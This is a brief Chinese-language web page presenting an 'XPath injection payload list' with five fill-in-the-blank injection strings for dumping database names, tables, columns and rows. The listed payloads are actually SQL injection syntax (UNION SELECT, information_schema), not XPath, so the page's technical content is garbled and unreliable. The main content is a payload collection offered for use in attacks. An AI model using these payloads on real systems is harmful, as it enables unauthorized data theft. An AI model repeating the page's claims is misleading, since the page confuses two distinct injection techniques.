📜  Xpath 注入有效负载列表 (1)

📅  最后修改于: 2023-12-03 14:48:39.281000             🧑  作者: Mango

Xpath 注入有效负载列表

Xpath 注入是一种针对 XML 数据库的攻击手法,攻击者会将恶意代码嵌入到 Xpath 查询中,以绕过身份验证和保护,从而获取敏感数据或者掌控整个系统。在进行 Xpath 注入测试时,需要准备一些有效负载,在本文中,我们将介绍 Xpath 注入的一些有效负载以及具体的用法。

Xpath 注入基础知识

在进行 Xpath 注入时,需要掌握一些基础知识,包括 Xpath 语法和注入点的位置。Xpath 语法类似于文件路径,可以直接访问 XML 数据库的节点和属性。而注入点是指在 Xpath 查询中可以注入恶意代码的位置,通常为节点和属性值。

Xpath 注入有效负载列表

在进行 Xpath 注入测试时,可以使用下面的有效负载进行测试。在注入点处,将有效负载替换为恶意代码即可,其中 {} 表示需要替换的位置。

  1. 获取数据库版本信息
' or 1=1 or database('')='{}
  1. 获取所有数据库名称
' or 1=1 union select distinct database() from information_schema.tables where table_schema!='mysql' limit 0,1#{}
  1. 获取所有表名称
' or 1=1 union select distinct table_name from information_schema.columns where table_schema!='mysql'#{}
  1. 获取所有字段名称
' or 1=1 union select distinct column_name from information_schema.columns where table_name='{}' and table_schema!='mysql'#{}
  1. 获取表数据
' or 1=1 union select * from {} limit 0,1#{}
总结

Xpath 注入是一种比较高级的攻击手法,需要掌握一定的技术知识和经验。在进行测试时,需要准备一些有效负载进行测试,也可以根据实际情况自定义有效负载。此处列举的有效负载仅供参考,具体的注入点和有效负载需要根据实际情况进行选择和调整。